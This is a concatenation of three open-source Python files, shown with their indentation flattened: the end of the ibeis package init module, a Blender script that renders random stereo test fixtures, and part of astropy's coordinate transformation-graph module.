build_commandline(e=e_, **kwargs)
lazy_func = functools.partial(func, ibs, testres, show_in_notebook=True, **kwargs)
return lazy_func
def draw_taghist(testres, **kwargs):
e_ = 'taghist'
func = find_expt_func(e_)
ibs = testres.ibs
build_commandline(e=e_, **kwargs)
lazy_func = functools.partial(func, ibs, testres, **kwargs)
return lazy_func
def execute_test():
func = find_expt_func(e)
assert func is not None, 'unknown experiment e=%r' % (e,)
argspec = ut.get_func_argspec(func)
if len(argspec.args) >= 2 and argspec.args[0] == 'ibs' and argspec.args[1] == 'testres':
# most experiments need a testres
expts_kw = dict(defaultdb=db, a=a, t=t,
qaid_override=qaid_override,
daid_override=daid_override,
initial_aids=initial_aids
)
testdata_expts_func = functools.partial(main_helpers.testdata_expts, **expts_kw)
ibs, testres = testdata_expts_func()
# Build the requested drawing funciton
draw_func = functools.partial(func, ibs, testres, **kwargs)
testres.draw_func = draw_func
ut.inject_func_as_method(testres, draw_cases)
ut.inject_func_as_method(testres, draw_taghist)
#testres.draw_cases = draw_cases
return testres
else:
raise AssertionError('Unknown type of function for experiment')
if lazy:
return execute_test
else:
testres = execute_test()
return testres
def testdata_expts(*args, **kwargs):
ibs, testres = main_helpers.testdata_expts(*args, **kwargs)
return testres
#import_subs()
#from ibeis import gui
#from ibeis import algo
#from ibeis import templates
#from ibeis import viz
#from ibeis import web
#class _VizProxy(object):
# def __init__(self):
# pass
# def getattr(self, key):
# import ibeis.viz as viz
# return getattr(viz, key)
# def setattr(self, key, val):
# import ibeis.viz as viz
# return getattr(viz, key, val)
#viz = _VizProxy
#import apipkg
#apipkg.initpkg(__name__, {
# 'viz': {
# 'clone': "ibeis.viz",
# }
#}
#)
from ibeis.init import main_helpers
testdata_cm = main_helpers.testdata_cm
testdata_cmlist = main_helpers.testdata_cmlist
testdata_qreq_ = main_helpers.testdata_qreq_
testdata_pipecfg = main_helpers.testdata_pipecfg
testdata_filtcfg = main_helpers.testdata_filtcfg
testdata_expts = main_helpers.testdata_expts
testdata_expanded_aids = main_helpers.testdata_expanded_aids
testdata_aids = main_helpers.testdata_aids
# Utool generated init makeinit.py
print, rrr, profile = ut.inject2(__name__, '[ibeis]')
def reload_subs(verbose=True):
""" Reloads ibeis and submodules """
import_subs()
rrr(verbose=verbose)
getattr(constants, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(main_module, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(params, 'rrr', lambda verbose: None)(verbose=verbose)
getattr(other, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(dbio, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(algo, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(control, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(viz, 'reload_subs', lambda: None)()
getattr(gui, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(algo, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(viz, 'reload_subs', lambda verbose: None)(verbose=verbose)
getattr(web, 'reload_subs', lambda verbose: None)(verbose=verbose)
rrr(verbose=verbose)
rrrr = reload_subs
from ibeis.control.DB_SCHEMA_CURRENT import VERSION_CURRENT
__version__ = VERSION_CURRENT
__version__ = '1.5.4'
if __version__ != VERSION_CURRENT:
raise AssertionError(
'need to update version in __init__ file from %r to %r so setup.py can work nicely' % (
__version__, VERSION_CURRENT))
"""
Regen Command:
Kinda have to work with the output of these. This module is hard to
autogenerate correctly.
cd /home/joncrall/code/ibeis/ibeis/other
makeinit.py -x web viz tests gui all_imports
makeinit.py -x constants params main_module other control dbio tests all_imports
"""
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis
python -m ibeis --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
|
#!/usr/bin/env python3
# Copyright (c) 2014 The Caroline authors. All rights reserved.
# Use of this source file is governed by a MIT license that can be found in the
# LICENSE file.
# Author: Aleksandr Derbenev <alex@technoworks.ru>
import json
from optparse import OptionParser
import os
import shutil
import random
import math
import bpy
class Bounds(object):
def __init__(self, camera):
self.angle_x = camera.angle_x
self.angle_y = camera.angle_y
self.angle = camera.angle
self.clip_near = camera.clip_start
self.clip_far = camera.clip_end
def random_mesh_origin(angle_x, angle_y, clip_near, clip_far):
"""Create random origin point for mesh. Assume that object will be visible if
it's origin is in the truncated pyramid."""
# Get z coordinate first because x and y ranges depends from it.
z = random.uniform(clip_near + 2, clip_far - 2)
x = random.uniform(-math.tan(angle_x / 2) * z,
math.tan(angle_x / 2) * z / 2)
y = random.uniform(-math.tan(angle_y / 2) * z,
math.tan(angle_y / 2) * z / 2)
return [x, y, -z]
def random_mesh_rotation():
"""Generate random angles for initial mesh rotation."""
return [random.random(), random.random(), random.random()];
def random_mesh_constructor():
"""Returs lambda for creating a random mesh with given origin point and
rotation."""
def dimension(max_size):
"""Return random value for dimension."""
return random.uniform(max_size / 10, max_size)
return random.choice((
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cone_add(radius1 = dimension(max_size) / 2,
radius2 = dimension(max_size) / 2, depth = dimension(max_size),
end_fill_type='TRIFAN',
location=origin, rotation=rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cube_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_cylinder_add(radius = dimension(max_size) / 2,
depth = dimension(max_size),
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_ico_sphere_add(size = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_monkey_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_plane_add(radius = dimension(max_size) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_torus_add(
major_radius = random.uniform(max_size / 4, max_size) / 2,
minor_radius = dimension(max_size / 5) / 2,
location = origin, rotation = rotation),
lambda origin, rotation, max_size:
bpy.ops.mesh.primitive_uv_sphere_add(size = dimension(max_size) / 2,
location = origin, rotation = rotation)
))
def override_context(options):
"""Copy bpy.context and replace some values by provided in dictionary."""
context = bpy.context.copy()
for key in options.keys():
context[key] = options[key]
return context
def parse_options():
"""Configure and run command line arguments parser."""
parser = OptionParser()
parser.add_option('-f', '--fixtures', dest = 'count', type = 'int',
default = 1, action = 'store',
help = 'Number of test fixtures to generate.')
parser.add_option('-m', '--meshes', dest = 'meshes', type = 'int',
default = 1, action = 'store',
help = 'Maximum number of meshes in the scene.')
parser.add_option('-o', '--output', dest = 'output', type = 'string',
default = 'fixture', action = 'store',
help = 'Name of the output directory. You can use %n for fixture number.'),
parser.add_option('-d', '--distance', dest = 'distance', type = 'float',
default = 0.08, action = 'store',
help = 'Distantion between cameras in meters.')
(options, args) = parser.parse_args()
if options.count < 1:
parser.error('Count of fixtures must be positive integer number.')
if options.meshes < 1:
parser.error('Maximum count of meshes must be positive integer number.')
if options.count > 1 and '%n' not in options.output:
options.output += '.%n'
if options.distance <= 0:
parser.error('Distance must be greater that 0.')
options.output = options.output.replace('%n', '{number}')
return (options, args);
def get_camera():
camera = None
for cam in bpy.data.cameras:
if cam.name in bpy.context.scene.objects.keys():
camera = cam
break
camera_object = bpy.data.objects[camera.name]
return (camera, camera_object)
def cleanup_scene():
"""Cleanup current scene"""
for item in bpy.data.meshes:
if item.name in bpy.context.scene.objects.keys():
bpy.context.scene.objects.unlink(bpy.data.objects[item.name])
def generate_mesh(bounds):
"""Count location and rotation for mesh, get and call constructor."""
origin = random_mesh_origin(bounds.angle_x, bounds.angle_y,
bounds.clip_near, bounds.clip_far)
rotation = random_mesh_rotation()
max_size = - origin[2] * math.tan(bounds.angle / 2)
random_mesh_constructor()(origin=origin, rotation=rotation,
max_size=max_size)
def generate_meshes(count, bounds):
"""Generate meshes on the scene."""
for i in range(count):
generate_mesh(bounds = bounds)
def setup_light(bounds):
"""Find and set lamp to the appropriate location."""
lamp = bpy.data.lamps[0]
if not lamp:
lamp = bpy.data.lamps.new(name='lamp', type='SUN')
lamp_object = bpy.data.objects[lamp.name]
if lamp.name not in bpy.context.scene.objects:
bpy.context.scene.objects.link(lamp_object)
lamp_location = [
0.0,
math.tan(bounds.angle) * bounds.clip_far,
-(bounds.clip_far - bounds.clip_near) / 2
]
lamp.type = 'SUN'
lamp_object.location = lamp_location
lamp_object.rotation_mode = 'XYZ'
lamp_object.rotation_euler = [0, - math.pi / 2, 0]
def prepare_dir(name):
"""Remove fixture directory if it exists. Create new one."""
if os.path.exists(name):
shutil.rmtree(name)
os.mkdir(name)
def save_models(name):
"""Save each mesh to the Standford ply file. Return scene dictionary for
config."""
scene = {}
for mesh in bpy.data.meshes:
if mesh.name in bpy.context.scene.objects.keys():
mesh_ply = mesh.name + '.ply'
bpy.ops.export_mesh.ply(override_context({'selected_objects': mesh}),
filepath=os.path.join(name, mesh_ply), check_existing=False,
use_mesh_modifiers=False, use_normals=False, use_uv_coords=False,
use_colors=False)
scene[mesh.name] = mesh_ply
return scene
def render_frames(name, distance, camera, camera_object, bounds):
"""Setup camera and render two frames."""
cameras = []
for i, location in enumerate([
[-distance / 2, 0, 0],
[distance / 2, 0, 0]
]):
render = bpy.context.scene.render
width = render.resolution_x
height = render.resolution_y
cam_name = 'camera_' + str(i)
render.filepath = os.path.join(name, cam_name + '.png')
camera_object.location = location
camera_object.rotation_mode = 'XYZ'
camera_object.rotation_euler = [0, 0, 0]
bpy.ops.render.render(animation=False, write_still=True)
cam = {
'focus': camera.lens / 1000.0,
'pixel_size': camera.sensor_width / width / 1000.0,
'width': width,
'height': height,
'position': camera_object.location[:],
'rotation': camera_object.rotation_euler[:],
'type': 'image',
'source': camera.name + '.png'
}
cameras.append(cam)
return cameras
def save_config(name, config):
"""Generate config.json for given fixture."""
config_file = open(os.path.join(name, 'config.json'), 'w')
json.dump(config, config_file, skipkeys=True, ensure_ascii=False,
allow_nan=False, indent=2, sort_keys=True)
config_file.write('\n')
def save_fixture(name, distance, camera, camera_object, bounds):
prepare_dir(name = name)
config = {}
config['scene'] = save_models(name = name)
config['cameras'] = render_frames(name = name, distance = distance,
camera = camera, camera_object = camera_object, bounds = bounds)
save_config(name = name, config = config)
def generate_fixture(name, meshes, distance):
"""Generate and save a fixture."""
name = os.path.normpath(name)
(camera, camera_object) = get_camera()
bounds = Bounds(camera)
cleanup_scene()
generate_meshes(count = meshes, bounds = bounds)
setup_light(bounds = bounds)
save_fixture(name = name, distance = distance, camera=camera,
camera_object=camera_object, bounds=bounds)
def generate_fixtures(count, output, meshes, distance):
"""Generate all fixtures."""
for i in range(count):
generate_fixture(name = output.format(number = i),
meshes = random.randrange(meshes) + 1, distance = distance)
def main():
"""Entry point."""
(options, args) = parse_options()
generate_fixtures(count = options.count, output = options.output,
meshes = options.meshes, distance = options.distance)
if __name__ == '__main__':
main()
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains a general framework for defining graphs of transformations
between coordinates, suitable for either spatial coordinates or more generalized
coordinate systems.
The fundamental idea is that each class is a node in the transformation graph,
and transitions from one node to another are defined as functions (or methods)
wrapped in transformation objects.
This module also includes more specific transformation classes for
celestial/spatial coordinate frames, generally focused around matrix-style
transformations that are typically how the algorithms are defined.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from abc import ABCMeta, abstractmethod
from collections import defaultdict
import numpy as np
from ..utils.compat import ignored
from ..utils.compat.funcsigs import signature
from ..extern import six
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform', 'CompositeTransform']
class TransformGraph(object):
"""
A graph representing the paths between coordinate frames.
"""
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache() # generates cache entries
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
"""
A `set` of all the frame classes present in this `TransformGraph`.
"""
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
def invalidate_cache(self):
"""
Invalidates the cache that stores optimizations for traversing the
transform graph. This is called automatically when transforms
are added or removed, but will need to be called manually if
weights on transforms are modified inplace.
"""
self._cached_names_dct = None
self._cached_frame_set = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
"""
Add a new coordinate transformation to the graph.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
transform : CoordinateTransform or similar callable
The transformation object. Typically a `CoordinateTransform` object,
although it may be some other callable that is called with the same
signature.
Raises
------
TypeError
If ``fromsys`` or ``tosys`` are not classes or ``transform`` is
not callable.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
"""
Removes a coordinate transform from the graph.
Parameters
----------
fromsys : class or `None`
The coordinate frame *class* to start from. If `None`,
``transform`` will be searched for and removed (``tosys`` must
also be `None`).
tosys : class or `None`
The coordinate frame *class* to transform into. If `None`,
``transform`` will be searched for and removed (``fromsys`` must
also be `None`).
transform : callable or `None`
The transformation object to be removed or `None`. If `None`
and ``tosys`` and ``fromsys`` are supplied, there will be no
check to ensure the correct object is removed.
"""
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
# search for the requested transform by brute force and remove it
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
if b is transform:
del agraph[b]
break
else:
raise ValueError('Could not find transform {0} in the '
'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
"""
Computes the shortest distance along the transform graph from
one system to another.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
path : list of classes or `None`
The path from ``fromsys`` to ``tosys`` as an in-order sequence
of classes. This list includes *both* ``fromsys`` and
``tosys``. Is `None` if there is no possible path.
distance : number
The total distance/priority from ``fromsys`` to ``tosys``. If
priorities are not set this is the number of transforms
needed. Is ``inf`` if there is no possible path.
"""
inf = float('inf')
# special-case the 0 or 1-path
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
# Means there's no transform necessary to go from it to itself.
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
#otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
nodes = []
# first make the list of nodes
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# fromsys or tosys are isolated or not registered, so there's
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
# entries in q are [distance, count, nodeobj, pathlist]
# count is needed because in py 3.x, tie-breaking fails on the nodes.
# this way, insertion order is preserved if the weights are the same
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
# this dict will store the distance to node from ``fromsys`` and the path
result = {}
# definitely starts as a valid heap because of the insert line; from the
# node to itself is always the shortest distance
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
# everything left is unreachable from fromsys, just copy them to
# the results and jump out of the loop
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
# this is a system that can be transformed to, but not from.
continue
for n2 in edgeweights[n]:
if n2 not in result: # already visited
# find where n2 is in the heap
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
# cache for later use
self._shortestpaths[fromsys] = result
return result[tosys]
def get_transform(self, fromsys, tosys):
"""
Generates and returns the `CompositeTransform` for a transformation
between two coordinate systems.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
Returns
-------
trans : `CompositeTransform` or `None`
If there is a path from ``fromsys`` to ``tosys``, this is a
transform object for that path. If no path could be found, this is
`None`.
Notes
-----
This function always returns a `CompositeTransform`, because
`CompositeTransform` is slightly more adaptable in the way it can be
called than other transform classes. Specifically, it takes care of
intermediate steps of transformations in a way that is consistent with
1-hop transformations.
"""
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(fromsys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]: # first element is fromsys so we skip it
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
"""
Tries to locate the coordinate class with the provided alias.
Parameters
----------
name : str
The alias to look up.
Returns
-------
coordcls
The coordinate class corresponding to the ``name`` or `None` if
no such class exists.
"""
return self._cached_names.get(name, None)
def get_names(self):
"""
Returns all available transform names. They will all be
valid arguments to `lookup_name`.
Returns
-------
nms : list
The aliases for coordinate systems.
"""
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None):
"""
Converts this transform graph to the graphviz_ DOT format.
Optionally saves it (requires `graphviz`_ be installed and on your path).
.. _graphviz: http://www.graphviz.org/
Parameters
----------
priorities : bool
If `True`, show the priority values for each transform. Otherwise,
the will not be included in the graph.
addnodes : sequence of str
Additional coordinate systems to add (this can include systems
already in the transform graph, but they will only appear once).
savefn : `None` or str
The file name to save this graph to or `None` to not save
to a file.
savelayout : str
The graphviz program to use to layout the graph (see
graphviz_ for details) or 'plain' to just save the DOT graph
content. Ignored if ``savefn`` is `None`.
saveformat : str
The graphviz output format. (e.g. the ``-Txxx`` option for
the command line program - see graphviz docs for details).
Ignored if ``savefn`` is `None`.
Returns
-------
dotgraph : str
A string with the DOT format graph.
"""
nodes = []
# find the node names
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
pri = agraph[b].priority if hasattr(agraph[b], 'priority') else 1
edgenames.append((a.__name__, b.__name__, pri))
# generate simple dot format graph
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights in edgenames:
labelstr = '[ label = "{0}" ]'.format(weights) if priorities else ''
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
def to_networkx_graph(self):
"""
Converts this transform graph into a networkx graph.
.. note::
You must have the `networkx <http://networkx.lanl.gov/>`_
package installed for this to work.
Returns
-------
nxgraph : `networkx.Graph <http://networkx.lanl.gov/reference/classes.graph.html>`_
This `TransformGraph` as a `networkx.Graph`_.
"""
import networkx as nx
nxgraph = nx.Graph()
# first make the nodes
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
# Now the edges
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
pri = agraph[b].priority if hasattr(agraph[b], 'priority') else 1
nxgraph.add_edge(a, b, weight=pri)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1):
"""
A function decorator for defining transformations.
.. note::
If decorating a static method of a class, ``@staticmethod``
should be added *above* this decorator.
Parameters
----------
transcls : class
The class of the transformation object to create.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
Returns
-------
deco : function
A function that can be called on another function as a decorator
(see example).
Notes
-----
This decorator assumes the first argument of the ``transcls``
initializer accepts a callable, and that the second and third
are ``fromsys`` and ``tosys``. If this is not true, you should just
initialize the class manually and use `add_transform` instead of
using this decorator.
Examples
--------
::
graph = TransformGraph()
class Frame1(BaseCoordinateFrame):
...
class Frame2(BaseCoordinateFrame):
...
@graph.transform(FunctionTransform, Frame1, Frame2)
def f1_to_f2(f1_obj):
... do something with f1_obj ...
return f2_obj
"""
def deco(func):
# this doesn't do anything directly with the transform because
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self)
return func
return deco
#<--------------------Define the builtin transform classes--------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
"""
An object that transforms a coordinate from one system to another.
Subclasses must implement `__call__` with the provided signature.
They should also call this superclass's ``__init__`` in their
``__init__``.
Parameters
----------
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
"""
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
hasattr(tosys, 'get_frame_attr_names')):
#the if statement is there so that non-frame things might be usable
#if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
"""
Add this transformation to the requested Transformation graph,
replacing anything already connecting these two coordinates.
Parameters
----------
graph : a TransformGraph object
The graph to register this transformation with.
"""
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
"""
Remove this transformation from the requested transformation
graph.
Parameters
----------
graph : a TransformGraph object
The graph to unregister this transformation from.
Raises
------
ValueError
If this is not currently in the transform graph.
"""
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
def __call__(self, fromcoord, toframe):
"""
Does the actual coordinate transformation from the ``fromsys`` class to
the ``tosys`` class.
Parameters
----------
fromcoord : fromsys object
An object of class matching ``fromsys`` that is to be transformed.
toframe : object
An object that has the attributes necessary to fully specify the
frame. That is, it must have attributes with names that match the
keys of the dictionary that ``tosys.get_frame_attr_names()``
returns. Typically this is of class ``tosys``, but it *might* be
some other class as long as it has the appropriate attributes.
Returns
-------
tocoord : tosys object
The new coordinate after the transform has been applied.
"""
class FunctionTransform(CoordinateTransform):
"""
A coordinate transformation defined by a function that accepts a
coordinate object and returns the transformed coordinate object.
Parameters
----------
func : callable
The transformation function. Should have a call signature
``func(formcoord, toframe)``. Note that, unlike
`CoordinateTransform.__call__`, ``toframe`` is assumed to be of type
``tosys`` for this function.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``func`` is not callable.
ValueError
If ``func`` cannot accept two arguments.
"""
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
with ignored(TypeError):
sig = signature(func)
kinds = [x.kind for x in sig.parameters.values()]
if (len(x for x in kinds if x == sig.POSITIONAL_ONLY) != 2
and not sig.VAR_POSITIONAL in kinds):
raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
return res
class StaticMatrixTransform(CoordinateTransform):
"""
A coordinate transformation defined as a 3 x 3 cartesian
transformation matrix.
This is distinct from DynamicMatrixTransform in that this kind of matrix is
independent of frame attributes. That is, it depends *only* on the class of
the frame.
Parameters
----------
matrix : array-like or callable
A 3 x 3 matrix for transforming 3-vectors. In most cases will
be unitary (although this is not strictly required). If a callable,
will be called *with no arguments* to get the matrix.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
ValueError
If the matrix is not 3 x 3
"""
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
from .representation import CartesianRepresentation, \
UnitSphericalRepresentation
xyz = fromcoord.represent_as(CartesianRepresentation).xyz
v = xyz.reshape((3, xyz.size // 3))
v2 = np.dot(np.asarray(self.matrix), v)
subshape = xyz.shape[1:]
x = v2[0].reshape(subshape)
y = v2[1].reshape(subshape)
z = v2[2].reshape(subshape)
newrep = CartesianRepresentation(x, y, z)
if fromcoord.data.__class__ == UnitSphericalRepresentation:
#need to special-case this because otherwise the new class will
#think it has a valid distance
newrep = newrep.represent_as(UnitSphericalRepresentation)
frameattrs = dict([(attrnm, getattr(fromcoord, attrnm))
for attrnm in self.overlapping_frame_attr_names])
return toframe.realize_frame(newrep, **frameattrs)
class DynamicMatrixTransform(CoordinateTransform):
"""
A coordinate transformation specified as a function that yields a
3 x 3 cartesian transformation matrix.
This is similar to, but distinct from StaticMatrixTransform, in that the
matrix for this class might depend on frame attributes.
Parameters
----------
matrix_func : callable
A callable that has the signature ``matrix_func(fromcoord, toframe)`` and
returns a 3 x 3 matrix that converts ``fromcoord`` in a cartesian
representation to the new coordinate system.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``matrix_func`` is not callable
"""
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
from .representation import CartesianRepresentation, \
UnitSphericalRepresentation
xyz = fromcoord.represent_as(CartesianRepresentation).xyz
v = xyz.reshape((3, xyz.size // 3))
v2 = np.dot(np.asarray(self.matrix_func(fromcoord, toframe)), v)
subshape = xyz.shape[1:]
x = v2[0].reshape(subshape)
y = v2[1].reshape(subshape)
z = v2[2].reshape(subshape)
newrep = CartesianRepresentation(x, y, z)
if fromcoord.data.__class__ == UnitSphericalRepresentation:
#need to special-case this because otherwise the new class will
#think it has a valid distance
newrep = newrep.represent_as(UnitSphericalRepresentation)
return toframe.realize_frame(newrep)
class CompositeTransform(CoordinateTransform):
"""
A transformation constructed by combining together a series of single-step
transformations.
Note that the intermediate frame objects are constructed using any frame
attributes in ``toframe`` or ``fromframe`` that overlap with the intermediate
frame (``toframe`` favored over ``fromframe`` if there's a conflict). Any frame
attributes that are not present use the defaults.
Parameters
----------
transforms : sequence of `CoordinateTransform` objects
The sequence of transformations to apply.
fromsys : class
